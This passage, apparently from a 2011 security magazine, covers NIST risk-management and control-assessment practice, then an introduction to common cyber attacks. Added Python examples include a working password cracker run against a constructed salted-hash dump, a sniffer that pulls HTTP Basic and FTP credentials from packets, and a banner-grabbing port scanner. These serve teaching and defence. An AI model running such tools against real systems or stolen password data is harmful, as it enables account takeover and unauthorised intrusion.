data and interconnecting systems.<br />
After categorizing the security level of the information<br />
asset, appropriate controls should be considered. The<br />
National Institute of Standards and Technology Special<br />
Publication 800-53 [8] (NIST SP800-53) covers control<br />
selection in 18 different areas:<br />
• Access Control<br />
• Awareness and Training<br />
• Audit and Accountability<br />
• Security Assessment and Authorization<br />
• Configuration Management<br />
• Contingency Planning<br />
• Identification and Authentication<br />
• Incident Response<br />
• Maintenance<br />
• Media Protection<br />
• Physical and Environmental Protection<br />
• Planning<br />
• Personnel Security<br />
• Risk Assessment<br />
• System and Services Acquisition<br />
• System and Communications Protection<br />
• System and Information Integrity<br />
• Program Management<br />
For each control objective listed, there is a<br />
corresponding set of recommended controls for<br />
each of the impact levels. Since there are so many<br />
controls to consider, controls are assigned a priority<br />
code that assists when planning an implementation<br />
sequence. Controls can be implemented either as a<br />
common control that applies to multiple systems or<br />
as a system-specific control that applies to individual<br />
systems. Compensating controls should be evaluated<br />
if a primary control cannot be implemented due<br />
to technical or other reasons. NIST SP 800-18 [9]<br />
defines compensating controls as the management,<br />
operational, or technical controls employed by an<br />
agency in lieu of prescribed controls in the low,<br />
moderate, or high security control baselines, which<br />
provide equivalent or comparable protection for an<br />
information system.<br />
For each system, a system security plan should be<br />
prepared using the business impact analysis and the<br />
selected security controls. After the system security<br />
plan has been completed, it should be presented to the<br />
system owner for approval. NIST SP 800-18 defines the<br />
items to document in a system security plan:<br />
• System Name and Identifier<br />
• System Categorization<br />
• System Owner<br />
• Authorizing Official<br />
• Other Designated Contacts<br />
• Assignment of Security Responsibility<br />
• System Operational Status<br />
• Information System Type<br />
• General Description/Purpose<br />
• System Environment<br />
• System Interconnection/Information Sharing<br />
• Law, Regulations, and Policies Affecting the<br />
System<br />
• Security Control Selection<br />
• Minimum Security Controls<br />
• Completion and Approval Dates<br />
Once the system security plan has been approved by<br />
the authorizing official, control implementation can<br />
begin. NIST SP800-70 [10] and the other documents<br />
in the NIST SP800 series provide guidance on control<br />
implementation. Configuration checklists published at<br />
the National Checklist Program Repository [11] provide<br />
detailed configuration guidance with recommended<br />
settings. The checklists are provided in different<br />
formats for use. Tier I checklists are human readable,<br />
Tier II are machine readable non-SCAP, Tier III should<br />
work in a SCAP validated tool, and Tier IV will work in<br />
a SCAP validated tool.<br />
Implementing controls is only a portion of the actual<br />
work. The controls need to be tested to verify they have<br />
been implemented correctly, operating as intended, and<br />
producing the desired security outcomes with respect<br />
to meeting the security requirements of the system.<br />
NIST SP800-53A [12] provides guidance on assessing<br />
system security controls.<br />
The recommended process begins with preparing<br />
for the security controls assessment. The preparation<br />
process includes gathering the information needed<br />
by the assessors, setting the expectations of affected<br />
parties regarding scope, depth, time schedule, gathering<br />
supporting documentation, etc. Resources will need to<br />
be obtained and assessor/auditors selected. Ideally,<br />
the assessors should have independence from the<br />
business and technology groups so they can provide an<br />
unbiased review.<br />
The second step of the assessment process is<br />
to create an assessment plan. The plan should<br />
determine the scope of the assessment and which<br />
controls will be tested. Specific test procedures and<br />
assessment depth should be determined. Three<br />
types of assessment methods are defined: examining<br />
controls, interviewing personnel, and testing controls.<br />
Three assessment procedure depths are defined<br />
progressing from the basic examination to the focused<br />
examination and leading to the comprehensive<br />
examination. Specific tests may need to be created to<br />
assess items not sufficiently covered by NIST SP800-<br />
53A or to meet organizational requirements. After the<br />
plan has been completed, it will need to be approved<br />
prior to testing.<br />
Resources<br />
• http://www.iso.org/iso/home.html [1]<br />
• http://www.iec.ch/ [2]<br />
• http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber=42103 [3]<br />
• https://www.isaca.org/Pages/default.aspx [4]<br />
• http://www.isaca.org/Knowledge-Center/cobit/Pages/Downloads.aspx [5]<br />
• http://csrc.nist.gov/ [6]<br />
• http://csrc.nist.gov/publications/fips/fips199/FIPS-PUB-199-final.pdf [7]<br />
• http://csrc.nist.gov/publications/nistpubs/800-53-Rev3/sp800-53-rev3-final_updated-errata_05-01-2010.pdf [8]<br />
• http://csrc.nist.gov/publications/nistpubs/800-18-Rev1/sp800-18-Rev1-final.pdf [9]<br />
• http://csrc.nist.gov/publications/nistpubs/800-70-rev2/SP800-70-rev2.pdf [10]<br />
• http://web.nvd.nist.gov/view/ncp/repository [11]<br />
• http://csrc.nist.gov/publications/nistpubs/800-53A-rev1/sp800-53A-rev1-final.pdf [12]<br />
The actual assessment begins with a set of<br />
determination statements that relate to the security<br />
controls implemented from the catalog in NIST SP800-<br />
53. An individual control listed in NIST SP800-53 may<br />
have multiple assessment objectives listed for the<br />
control in NIST SP800-53A.<br />
For example, NIST SP800-53 provides control AC-<br />
1 Access Control Policies and Procedures. NIST<br />
SP800-53A has two assessment objectives listed: AC-1.1<br />
and AC-1.2. NIST SP800-53A assessment objective<br />
AC-1.1 determines whether the policy and procedures exist<br />
and contain certain key items, and whether the organization<br />
distributes the policy, develops procedures, and distributes<br />
the procedures to the appropriate staff. Assessment objective<br />
AC-1.2 determines whether the policies and procedures have a<br />
defined update schedule and whether the organization actually<br />
updates the policies and procedures according to that<br />
schedule.<br />
The output of the security control assessment is the<br />
security assessment report. The security assessment<br />
report details the items tested and documents the results<br />
to provide evidence for each finding. For each item, a<br />
rating of either satisfied (S) or other than satisfied (O) is recorded.<br />
The organization may wish to have a summary report<br />
that provides the highlights of the report, a synopsis of<br />
key findings, and recommendations for addressing the<br />
deficiencies.<br />
The security assessment report will need to be<br />
reviewed by senior management. Management may<br />
determine that certain items present a lower or higher<br />
risk than indicated in the controls assessments and<br />
risk assessments based on the organization mission<br />
and the operational environment. Items that should<br />
be addressed are used to create a plan of actions<br />
and milestones (POAM) that management can use to<br />
direct remediation efforts. After management review,<br />
the system security plan and risk assessment should<br />
be updated accordingly. It should be noted that some<br />
risk will remain after the implementation of controls.<br />
This residual risk may be accepted by management<br />
or transferred to others through actions such as<br />
obtaining insurance policies.<br />
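The roll-up from determination statements to the assessment report and the plan of actions and milestones, as an added example that is not code from the article: each AC-1.1 and AC-1.2 determination gets a finding, an objective is Satisfied only when all of its determinations are, a control takes the worst rating of its objectives, and every failed determination becomes a POAM item. The determination texts paraphrase the article's description of AC-1.1 and AC-1.2; the findings themselves are constructed.

```python
"""Roll-up of NIST SP 800-53A style determination statements into a security
assessment report and a POA&M. Added example; determinations paraphrase the
article and all findings are constructed."""
from dataclasses import dataclass

SATISFIED, OTHER = "S", "O"      # the two ratings the article describes


@dataclass(frozen=True)
class Determination:
    objective: str    # assessment objective, e.g. "AC-1.1"
    statement: str    # what the assessor had to determine
    method: str       # examine, interview or test
    satisfied: bool   # the assessor's finding for this statement


def objective_ratings(determinations):
    """An objective is Satisfied only when every determination under it is;
    a single failed determination makes it Other than satisfied."""
    ratings = {}
    for d in determinations:
        if d.satisfied:
            ratings.setdefault(d.objective, SATISFIED)
        else:
            ratings[d.objective] = OTHER
    return ratings


def control_ratings(determinations):
    """A control (AC-1) takes the worst rating of its objectives (AC-1.1, AC-1.2)."""
    ratings = {}
    for objective, rating in objective_ratings(determinations).items():
        control = objective.rsplit(".", 1)[0]
        if rating == OTHER or control not in ratings:
            ratings[control] = rating
    return ratings


def poam(determinations):
    """Plan of actions and milestones: one item per failed determination, so
    management has the specific evidence needed to direct remediation."""
    return [{"objective": d.objective, "method": d.method, "finding": d.statement}
            for d in determinations if not d.satisfied]


def assessment_report(determinations):
    """The security assessment report: ratings per objective and control,
    plus the remediation items derived from them."""
    return {"objectives": objective_ratings(determinations),
            "controls": control_ratings(determinations),
            "poam": poam(determinations)}


# Constructed findings for AC-1. AC-1.1: policy and procedures exist, contain
# key items and are distributed; AC-1.2: an update schedule exists and is kept.
AC1_RESULTS = (
    Determination("AC-1.1", "an access control policy exists and addresses purpose, scope and roles", "examine", True),
    Determination("AC-1.1", "the policy has been distributed to the appropriate staff", "interview", True),
    Determination("AC-1.1", "procedures implementing the policy exist and have been distributed", "examine", True),
    Determination("AC-1.2", "the policy and procedures have a defined update schedule", "examine", True),
    Determination("AC-1.2", "the policy and procedures were actually updated on that schedule", "examine", False),
)

if __name__ == "__main__":
    import json
    print(json.dumps(assessment_report(AC1_RESULTS), indent=2))
```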
The risk management cycle is a continuous process.<br />
After these steps have been completed, the results<br />
should be used as a starting point for a new risk<br />
management cycle. The risk management framework<br />
can be adapted to the individual requirements of the<br />
organization. Since technologies and threats evolve<br />
over time, the risk management cycle should be<br />
repeated at regular intervals. The process can be used<br />
for new systems under development to ensure proper<br />
control selection, or it can be applied to existing systems<br />
to perform a gap analysis comparing current controls<br />
with the desired state.<br />
BART HOPPER<br />
Bart Hopper has earned numerous certifications during<br />
his 18 years as an information technology professional.<br />
His certifications cover the areas of information security,<br />
Windows administration, Unix administration, and database<br />
administration. He lives in Nashville, Tennessee.<br />
SOLUTIONS<br />
Why is Cyber Security<br />
Important?<br />
Cyber Security – Who is Responsible?<br />
Martha, the branch manager of a small private bank, while<br />
casually checking some bank statements noticed a large number<br />
of unusual transactions on a number of savings accounts<br />
belonging to pensioners. It appeared as though a number of<br />
pensioners had suddenly decided to transfer a portion of their<br />
pension money into a couple of accounts belonging to a Mr. A and<br />
Mrs. C, who had then withdrawn all the money from various ATMs.<br />
One of the pensioners was her own uncle. A<br />
puzzled Martha decided to contact her uncle<br />
who denied having made any such payments<br />
to anyone. Besides, he was not tech savvy enough to operate a<br />
computer and transfer money into other accounts.<br />
The bank had recently computerized its systems,<br />
implemented a basic version of online banking and<br />
enrolled a number of customers to transact online. But<br />
the bank had no qualified IT manager, and Martha also<br />
doubled as the tech manager in charge of babysitting<br />
the systems. Only Martha had the admin rights needed to<br />
carry out the end-to-end steps of a money transfer, and<br />
she had definitely not done those transactions, which<br />
meant either that her credentials had been used without<br />
her knowledge or that the application's controls had been<br />
bypassed altogether. The time stamps of the transactions<br />
were all on weekends and late at night, when neither she<br />
nor anyone else was in the bank to do anything of the sort.<br />
Martha could not work out what had gone wrong. Suspecting<br />
something bigger, she immediately notified the bank head,<br />
who called the police. The police brought their technical<br />
specialist, who quickly established that many accounts had<br />
been compromised by someone who had systematically<br />
siphoned off thousands of dollars remotely through<br />
loopholes in the basic online system. However, the police<br />
could do nothing, because the bank's computer systems did<br />
not keep the logs and other details needed to track the<br />
thieves. After an internal brainstorming session the<br />
bank's management decided to absorb the losses to avoid<br />
bad publicity and media attention. The thieves were never<br />
caught and were probably enjoying a holiday somewhere. In<br />
other words, the bank had been robbed.<br />
starterkit 02/2011(2)<br />
Until a decade ago, if you wanted to rob a bank you had<br />
to stage an armed raid, take hostages, spill blood, use<br />
getaway cars and so on, with all the associated risk of<br />
botching the operation. Or you had to indulge in excellent<br />
forgery and duplicate paperwork to siphon off funds. Today<br />
you do not even need to visit a bank to loot it, and it may<br />
be weeks before anyone raises an alarm. So why is it now so<br />
easy for criminals to loot a bank? The simple answer is the<br />
Internet. Many aspects of our lives, such as banking,<br />
purchases and communications, and even the military,<br />
depend on the Internet and worldwide connectivity. While<br />
the Internet offers many conveniences, it can also ruin<br />
your life in an instant through identity theft, online<br />
scams and other threats. For example, a tech savvy thief<br />
can sit comfortably at home and, at leisure, hack into the<br />
bank's computer system with off-the-shelf attack tools to<br />
swindle hundreds of customers out of their money. While<br />
this is an example of plain theft, the Internet can also be<br />
used for much bigger crimes. For example, hostile states<br />
can launch a large-scale cyber attack on another country<br />
and cripple its websites, banking systems, communications,<br />
etc., and create mayhem. And all of these nefarious<br />
activities can be carried out anonymously from anywhere<br />
in the world. Worldwide, hundreds of companies get hacked<br />
and many do not even realize it, because they lack the<br />
expertise to detect an intrusion. Sometimes the hacking<br />
is harmless and sometimes it is devastating and can even<br />
ruin an organization. For example, the recent breach of<br />
Sony's PlayStation Network caused a great deal of damage<br />
and annoyance to millions of users. The breach led to the<br />
theft of the data of more than 70 million users, and it<br />
took Sony several weeks to restore the service. Sony is<br />
not alone. Unknown to most people and business managers,<br />
there have been scores of computer attacks, network<br />
intrusions and data breaches over the last few years.<br />
Every time we make a purchase online, visit a website or<br />
carry out an online banking transaction, we are exposing<br />
ourselves to risk. Here is a short list of major hacks<br />
from the last few years.<br />
• Citibank: In 1994 a Russian programmer, Vladimir<br />
Levin, broke into Citibank's funds transfer system and<br />
moved about $10 million into accounts that he and his<br />
accomplices controlled in the US, Finland, Holland,<br />
Germany and Israel. It was one of the first widely<br />
reported cases of a bank being robbed over a network.<br />
He was arrested in the UK in 1995 and later extradited<br />
to the US.<br />
• Timothy Lloyd, the network administrator at Omega<br />
Engineering, a US supplier of components to NASA and the<br />
US Navy, planted a few lines of malicious code in the<br />
company's network. The code was a logic bomb, designed to<br />
delete the software running Omega's manufacturing<br />
operations, and it went off after he had been dismissed.<br />
Omega put its losses at about $10 million.<br />
• The Melissa virus, a mass-mailing macro virus written<br />
by David L. Smith in 1999, was among the first to cause<br />
damage on a global scale. It spread to thousands of<br />
companies worldwide, clogging and disabling their mail<br />
systems. Damage estimates reported at the time ran as<br />
high as $400 million. Smith pleaded guilty and was<br />
sentenced to 20 months in federal prison.<br />
• Google Gmail: In 2011 Google reported that a phishing<br />
campaign traced to China had compromised hundreds of<br />
Gmail accounts, including those of senior US government<br />
officials, military personnel, political activists and<br />
journalists.<br />
• NASA: Many NASA servers have been penetrated by<br />
hackers who were able to steal confidential data<br />
related to satellites and imagery.<br />
And the list goes on. Some of the common ways computers<br />
get hacked or disabled are as follows.<br />
Password Stealing<br />
A password is just a string of keyboard characters that<br />
a person must remember and type into a computer when<br />
required. There are several methods of cracking one.<br />
Specialized password cracking tools can recover a<br />
password using dictionary attacks (trying every entry in<br />
a word list), brute force attacks (trying every possible<br />
combination of characters up to some length) and hybrid<br />
attacks (dictionary words with common mangling rules such<br />
as capitalization, appended digits and character<br />
substitutions). Short and dictionary-based passwords fall<br />
quickly; long passphrases and a slow, salted password hash<br />
are what make cracking impractical.<br />
Trojan Horses<br />
A Trojan horse is malicious software surreptitiously<br />
delivered onto a computer, usually disguised as something<br />
the user wants. A Trojan horse may destroy hard drives,<br />
corrupt files, record keystrokes, monitor network traffic,<br />
track web usage, allow remote control, transmit data files<br />
to others, launch attacks against other targets, and more.<br />
All a Trojan horse attack needs to succeed is a single user<br />
to execute the program. Once that happens, the malicious<br />
software runs automatically, often without any symptoms of<br />
unwanted activity. A Trojan horse could be delivered via<br />
e-mail as an attachment, presented on a website as a<br />
download, and so on. In any case, your protection lies in<br />
malicious code detection tools, modern anti-virus<br />
protection, other forms of malware scanners, running<br />
ordinary users without administrator rights, and user<br />
education.<br />
Denial of Service<br />
Sometimes an attacker uses a network of compromised<br />
computers (a botnet) to sabotage a specific website or<br />
server. The idea is to make all of those computers contact<br />
the server or website repeatedly. The sudden increase in<br />
traffic can make the site very slow or cause it to collapse,<br />
and sometimes the traffic is enough to knock it offline<br />
completely. This is a Denial of Service (DoS) attack; when<br />
the traffic comes from many machines at once it is a<br />
Distributed Denial of Service (DDoS) attack, which is much<br />
harder to block by source address.<br />
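The bank in the opening story could not give the police any logs; the first thing a flood of<br />
this kind needs is a log that is actually kept and read. The following is an added example, not<br />
code from the original article: it parses web-server access log lines (Common Log Format), counts<br />
requests per second and per source, and flags the seconds whose volume exceeds a threshold, telling<br />
a single-source flood apart from a distributed one. The log lines are constructed for the example;<br />
the threshold and the "10 or more sources" rule are assumptions to be tuned to your own baseline.<br />

```python
import re
from collections import Counter
from datetime import datetime

# Common Log Format line: ip ident user [timestamp] "request" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

def make_sample_log():
    """Constructed access log (not real traffic): light normal traffic, then two flood seconds."""
    def line(ip, sec, path="/index.html"):
        return f'{ip} - - [05/Dec/2011:22:14:{sec:02d} +0000] "GET {path} HTTP/1.1" 200 512'
    lines = []
    for sec in range(0, 5):                       # seconds 00-04: three regular clients
        for ip in ("10.0.0.5", "10.0.0.9", "10.0.0.12"):
            lines.append(line(ip, sec))
    for i in range(150):                          # second 05: 30 sources, 5 requests each (distributed)
        lines.append(line(f"198.51.100.{i % 30 + 1}", 5, "/"))
    for _ in range(120):                          # second 06: one source hammering the login page
        lines.append(line("203.0.113.7", 6, "/login"))
    for sec in range(7, 10):                      # seconds 07-09: back to normal
        lines.append(line("10.0.0.5", sec))
    return lines

def requests_per_second(lines):
    """Map each second ("YYYY-MM-DD HH:MM:SS") to a Counter of requesting IPs; malformed lines are skipped."""
    buckets = {}
    for raw in lines:
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        buckets.setdefault(ts.strftime("%Y-%m-%d %H:%M:%S"), Counter())[m.group("ip")] += 1
    return buckets

def detect_flood(lines, threshold):
    """Flag every second whose request count exceeds threshold and say what kind of flood it looks like."""
    alerts = []
    for second, by_ip in sorted(requests_per_second(lines).items()):
        total = sum(by_ip.values())
        if total <= threshold:
            continue
        top_ip, top_count = by_ip.most_common(1)[0]
        if len(by_ip) >= 10:
            kind = "distributed flood"        # many sources: blocking by address will not help much
        elif top_count / total >= 0.8:
            kind = "single-source flood"      # one address: rate-limit or block it at the edge
        else:
            kind = "traffic spike"
        alerts.append({
            "second": second, "total": total, "distinct_sources": len(by_ip),
            "top_source": (top_ip, top_count), "kind": kind,
        })
    return alerts

if __name__ == "__main__":
    for a in detect_flood(make_sample_log(), threshold=50):
        print(f'{a["second"]} {a["kind"]}: {a["total"]} requests from '
              f'{a["distinct_sources"]} sources, top {a["top_source"]}')
```

On the constructed log this reports the 22:14:05 second as a distributed flood (150 requests from<br />
30 addresses) and the 22:14:06 second as a single-source flood (120 requests from 203.0.113.7).<br />
The two kinds call for different responses: a single source can be rate-limited or blocked at the<br />
edge, while a distributed flood needs upstream filtering or more capacity.<br />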
Exploiting Settings<br />
Attacking a target network or computer is easier when<br />
the target is still using the defaults set by the<br />
manufacturer: default administrator passwords, default<br />
SNMP community strings, and sample applications or<br />
services that are enabled but never used. Many attack<br />
tools and scripts assume that the target is configured<br />
with these defaults. Hence, one of the most effective and<br />
cheapest security precautions is simply to change them.<br />
It is your responsibility to know the defaults of the<br />
hardware and software products you use and to change them<br />
to custom settings. The more you harden your configuration,<br />
the less of it attack tools and exploitation scripts will<br />
find in the state they expect. Note that changing defaults<br />
removes the easiest targets; it does not fix flaws in the<br />
software itself, so patching is still required.<br />
Defacing Websites<br />
A fairly common form of external attack is website<br />
defacement: your company website is altered and nonsense<br />
or hostile content is displayed in its place. The attack<br />
described here uses password guessing to get into the<br />
site's administrative login. A dictionary file (a text<br />
file full of words and common passwords) is loaded into a<br />
cracking application, which runs it against the common<br />
user accounts used by the application or the website<br />
login. Because the majority of passwords are simplistic,<br />
a dictionary attack is often enough to do the job. Account<br />
lockout or rate limiting on the login form blunts this<br />
kind of online guessing; it does nothing against offline<br />
cracking of a stolen password database.<br />
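The three cracking methods named under Password Stealing above, and the dictionary attack on<br />
website logins just described, use the same candidate generators; the only difference is whether<br />
the guesses are hashed locally against a stolen table (offline) or submitted to a login form<br />
(online). The following is an added example, not code from the original article. It runs a<br />
dictionary, a hybrid and a brute force pass against a constructed dump of five accounts, assuming<br />
the stored form is hex(SHA-256(salt || password)) with the salt stored next to the digest; the<br />
seven-word list stands in for a real multi-million-entry list.<br />

```python
import hashlib
import itertools
import string

def salted_sha256(salt, password):
    """Hash scheme assumed for the dumped table: hex(SHA-256(salt || password))."""
    return hashlib.sha256((salt + password).encode()).hexdigest()

# Constructed fixture: five users with the passwords below. The cracker only ever sees
# DUMPED_TABLE (username -> (salt, digest)), never the plaintexts.
_PLAINTEXTS = {
    "alice": ("s1", "letmein"),                        # plain dictionary word
    "bob":   ("s2", "Summer2011"),                     # capitalized word + year
    "carol": ("s3", "p@ssw0rd"),                       # leet-speak substitutions
    "dave":  ("s4", "7b2"),                            # short, random-looking
    "erin":  ("s5", "correct horse battery staple"),   # long passphrase
}
DUMPED_TABLE = {u: (salt, salted_sha256(salt, pw)) for u, (salt, pw) in _PLAINTEXTS.items()}

# Tiny stand-in for a real word list (assumption: real lists have millions of entries).
WORDLIST = ["password", "welcome", "letmein", "summer", "admin", "qwerty", "monkey"]
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0"})

def dictionary_candidates(words):
    """Dictionary attack: each word exactly as listed."""
    yield from words

def hybrid_candidates(words):
    """Hybrid attack: dictionary words with common mangling rules applied."""
    suffixes = ["!", "1", "123"] + [str(year) for year in range(2005, 2012)]
    for w in words:
        for base in (w, w.capitalize(), w.upper(), w.translate(LEET)):
            yield base
            for suffix in suffixes:
                yield base + suffix

def brute_force_candidates(alphabet=string.ascii_lowercase + string.digits, max_len=3):
    """Brute force: every string over the alphabet up to max_len (36^3, about 47k candidates here)."""
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            yield "".join(chars)

def crack(table, candidate_sources, hash_fn=salted_sha256):
    """Run each candidate source against every still-uncracked account; return user -> password."""
    found = {}
    for source in candidate_sources:
        for candidate in source:
            for user, (salt, digest) in table.items():
                if user not in found and hash_fn(salt, candidate) == digest:
                    found[user] = candidate
            if len(found) == len(table):
                return found
    return found

if __name__ == "__main__":
    result = crack(DUMPED_TABLE, [dictionary_candidates(WORDLIST),
                                  hybrid_candidates(WORDLIST),
                                  brute_force_candidates()])
    for user in DUMPED_TABLE:
        print(f"{user:6} {result.get(user, '<not cracked>')}")
```

Four of the five accounts fall in well under a second; only the long passphrase survives. The<br />
per-user salt stops precomputed tables but does nothing against guessing, which is why a<br />
deliberately slow hash (bcrypt, scrypt or PBKDF2) matters for the offline case. For the online<br />
case against a login form the same generators apply, but lockout and rate limiting cap the number<br />
of guesses an attacker gets.<br />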
Packet Sniffing<br />
A packet sniffer is an application that captures data<br />
packets from the network. Any password or other sensitive<br />
data sent in cleartext, as older protocols such as HTTP<br />
Basic authentication, FTP and Telnet do, can be read<br />
straight out of the captured traffic. Encrypting the<br />
connection (TLS, SSH) is the defense.<br />
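To show what a sniffer actually sees, the following added example (not code from the original<br />
article) parses raw Ethernet/IPv4/TCP frames and pulls cleartext credentials out of HTTP Basic<br />
authentication headers and FTP USER/PASS commands. The frames are constructed inline to stand in<br />
for a capture; the host name onlinebank.example and the credentials in them are made up, and the<br />
TLS record included shows that an encrypted session yields nothing.<br />

```python
import base64
import re
import struct

def _ip_bytes(dotted):
    return bytes(int(octet) for octet in dotted.split("."))

def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Constructed Ethernet/IPv4/TCP frame with the given payload (checksums left zero; a sniffer never needs them)."""
    eth = b"\x00" * 12 + b"\x08\x00"                       # dst MAC, src MAC, EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     _ip_bytes(src_ip), _ip_bytes(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload

def parse_frame(frame):
    """Return src/dst/ports/payload of an IPv4-over-Ethernet TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    if frame[14] >> 4 != 4 or frame[23] != 6:             # not IPv4, or not TCP
        return None
    ihl = (frame[14] & 0x0F) * 4                           # IP header length (options included)
    total_len = struct.unpack("!H", frame[16:18])[0]
    tcp_off = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[tcp_off:tcp_off + 4])
    data_off = (frame[tcp_off + 12] >> 4) * 4              # TCP header length (options included)
    return {
        "src": ".".join(map(str, frame[26:30])), "dst": ".".join(map(str, frame[30:34])),
        "sport": sport, "dport": dport,
        "payload": frame[tcp_off + data_off:14 + total_len],
    }

BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
FTP_RE = re.compile(rb"^(USER|PASS)\s+(\S+)", re.MULTILINE)

def extract_credentials(frames):
    """Pull cleartext credentials (HTTP Basic auth, FTP USER/PASS) out of captured frames."""
    findings = []
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None:
            continue
        where = {"src": pkt["src"], "dst": pkt["dst"], "dport": pkt["dport"]}
        m = BASIC_RE.search(pkt["payload"])
        if m:
            findings.append({**where, "kind": "http-basic",
                             "secret": base64.b64decode(m.group(1)).decode("utf-8", "replace")})
        for verb, value in FTP_RE.findall(pkt["payload"]):
            findings.append({**where, "kind": "ftp-" + verb.decode().lower(), "secret": value.decode()})
    return findings

# Constructed capture: a Basic-auth request to a web app, an FTP login, a TLS record and an ARP frame.
_BASIC = base64.b64encode(b"martha:Bank2011").decode()
SAMPLE_CAPTURE = [
    build_frame("10.0.0.5", "10.0.0.20", 51000, 80,
                f"GET /admin HTTP/1.1\r\nHost: onlinebank.example\r\nAuthorization: Basic {_BASIC}\r\n\r\n".encode()),
    build_frame("10.0.0.5", "10.0.0.21", 51001, 21, b"USER backup\r\n"),
    build_frame("10.0.0.5", "10.0.0.21", 51001, 21, b"PASS nightly!\r\n"),
    build_frame("10.0.0.5", "10.0.0.20", 51002, 443, b"\x16\x03\x01\x00\x2a" + b"\x00" * 42),  # TLS: opaque
    b"\xff" * 12 + b"\x08\x06" + b"\x00" * 28,                                                    # ARP: skipped
]

if __name__ == "__main__":
    for f in extract_credentials(SAMPLE_CAPTURE):
        print(f'{f["src"]} -> {f["dst"]}:{f["dport"]} {f["kind"]}: {f["secret"]}')
```

Basic authentication only base64-encodes "user:password", so decoding it is trivial once the<br />
packet is in hand; the FTP login arrives as two plain commands. The TLS record on port 443<br />
produces no finding, which is the whole argument for encrypting the transport.<br />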
Key Loggers<br />
These are programs that record keystrokes made by a<br />
user, allowing crackers to discover passwords and login<br />
codes.<br />
Rootkits and Backdoors<br />
A rootkit is a collection of programs that gives an<br />
attacker administrator-level control of a computer while<br />
hiding its own presence from the operating system and<br />
security tools. Attackers use rootkits to keep control of<br />
compromised machines and evade detection. Backdoors are<br />
ways of bypassing the normal authentication and access<br />
controls of a system, allowing an attacker to get back in<br />
and access information on the computer at will.<br />
Spoofing Attack (Phishing)<br />
A spoofing attack usually involves a program, system or<br />
website masquerading as another, so that it is treated as<br />
a trusted system by a user or another program. Phishing is<br />
the common e-mail and web form of this: a message that<br />
appears to come from your bank leads to a look-alike login<br />
page. The purpose is usually to fool programs, systems or<br />
users into revealing confidential information, such as<br />
user names and passwords, to the attacker.<br />
Vulnerability Scanner<br />
A vulnerability scanner is a tool that checks computers<br />
and networks for known weaknesses, typically by probing<br />
each service and comparing its version and configuration<br />
against a database of known vulnerabilities. Attackers<br />
also commonly use port scanners. These tools check which<br />
ports on a specified computer are open, that is, which<br />
network services are listening and reachable. Once open<br />
ports are discovered, the attacker knows which services to<br />
go after and looks for a weakness in one of them. Running<br />
the same scanners against your own systems, before an<br />
attacker does, is one of the cheapest checks available.<br />
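The port scanner described above, as an added example that is not code from the original article:<br />
a TCP connect scan that reports which ports accept a connection and grabs whatever banner the<br />
service sends, which is the version information a vulnerability scanner would then match against<br />
its database. So that it runs offline, the example starts its own throwaway listener on 127.0.0.1<br />
with a made-up banner (SSH-2.0-DemoSSH_1.0, not a real product) and scans that port alongside one<br />
that is known to be closed.<br />

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

def probe(host, port, timeout=0.5):
    """TCP connect scan of one port: (port, is_open, banner). Completing the handshake is what
    a 'connect' scan does; it is noisy but needs no raw-socket privileges."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        if s.connect_ex((host, port)) != 0:
            return port, False, ""
        try:
            banner = s.recv(128).decode("ascii", "replace").strip()   # many daemons greet first
        except (socket.timeout, OSError):
            banner = ""
        return port, True, banner

def scan(host, ports, timeout=0.5, workers=32):
    """Scan the given ports concurrently; returns {port: (is_open, banner)}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return {port: (is_open, banner) for port, is_open, banner in results}

def start_demo_service(banner=b"SSH-2.0-DemoSSH_1.0\r\n"):
    """Constructed stand-in for a real daemon on 127.0.0.1:<ephemeral port> that sends a banner
    and hangs up. Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # listening socket closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]

def demo_scan():
    """Scan one listening port and one port known to be closed; returns a summary dict."""
    srv, open_port = start_demo_service()
    probe_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe_sock.bind(("127.0.0.1", 0))
    closed_port = probe_sock.getsockname()[1]
    probe_sock.close()                      # nothing listens there now
    try:
        results = scan("127.0.0.1", [open_port, closed_port], timeout=2.0)
    finally:
        srv.close()
    return {
        "open_port": open_port, "closed_port": closed_port,
        "open": results[open_port][0], "banner": results[open_port][1],
        "closed_reported_open": results[closed_port][0],
    }

if __name__ == "__main__":
    summary = demo_scan()
    print(f'port {summary["open_port"]}: open, banner {summary["banner"]!r}')
    print(f'port {summary["closed_port"]}: {"open" if summary["closed_reported_open"] else "closed"}')
```

Against your own hosts, replace the demo listener with the real address and a port range such as<br />
range(1, 1025); anything that answers with a banner you did not expect, or a port you did not know<br />
was open, is the finding to chase. Scan only systems you are authorized to test.<br />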
So how do you protect your organization from such<br />
attacks? The simple answer of avoiding the Internet is<br />
not feasible, because the global economy now depends on<br />
the Internet and you cannot opt out of it. Hence customers,<br />
businesses and governments need additional confidence that<br />
their money, confidential documents, military secrets,<br />
etc., are not compromised by pranksters and enemies.<br />
